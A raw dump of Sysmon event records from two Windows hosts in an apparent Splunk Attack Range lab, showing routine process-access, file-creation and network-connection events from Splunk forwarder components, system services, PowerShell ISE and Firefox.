08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.392{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.393{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:54.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3747C6BF270A92E72985FE29956CEFC,SHA256=6D88776CE6091F9421816738AEB11FC44388E143F2E04360E6A19CE82C901CAD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E7B8DCF5C174053142E637B9134C3D,SHA256=0052F08420EA8B0851DC97966EA1101E5E8DC6B158C838E20319E199CCAD3383,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.084{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.069{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:55.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E9CBD0DDC2AE7E69D216B6CECFA16E6,SHA256=08F3BFEB74CD95FC68C5729BB609D76C1526137D30E2D1AD2CE87404CCDC7838,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000809862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:54.352{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com55844-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:55.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F59D29EAA1E75305444F5465C491C3F5,SHA256=6130CDAE42022FB4754CA2B676B08F71876E81136E819644975808D72EC68DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:55.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=836BE8723EF4C294DC2071B4CF862558,SHA256=DB25BA3D3B083EB42893D3C5401981A3CC0A3DBB3E7D68917040516A75A8ED06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:56.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC0A164D64A2486C29F61276A1D56A8,SHA256=E3AD8000E683A26B23859B35919484D9DD648ED51AE7F83C55F1E021009457C6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:56.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F170320D39EC9F1AD36D0999959BCC07,SHA256=F19FB39D613F01E65F132B9F30E05D93A54F679D67FCF3AF243E2CC77085C3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AEDF16167CD0C8874DFD2C45B0122B2,SHA256=2D099BC04DDC70419D5E099923BEF216B65797E8B8402BD7FAD61C975FE7A67E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:56.292{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57427-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:57.456{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC33C116BF8CDD3DD46C02C717CB3CCF,SHA256=E0AC55AB8B28264F71C29A103BC0FB52D96507F2D1E77FBC000E79400005AA85,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001053535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:48.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61927-false10.0.1.12-8000- 23542300x80000000000000001053534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.273{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:58.487{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECD19200AA4D16AD42C8CF4F378514D,SHA256=9E85F6354EEE6B474FCEEEC541FDA75C15EDB79E7094458E41375B9516E30476,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:58.655{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3088FD828FC62AF2A1F7A174D03817A,SHA256=E8F9DA6C6ACE854257F903C889EE3636B21E2468BB36F7651B242C58EE9D4E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:58.240{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf74ee8c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C743F84F531B7C5335C56955A14E145B,SHA256=F21227027A979A855C898A6B01D293B7734C2E65384BDE949CA129A04633109E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:59.488{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52D9B1C0D429DBAB7CB8F0EED6A7F6F,SHA256=9C677FEF40D8C27586DD29E6D88C915008631DA5A0D8D2529F73CD46546EF5A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.803{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61928-false10.0.1.12-8089- 10341000x80000000000000001053546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
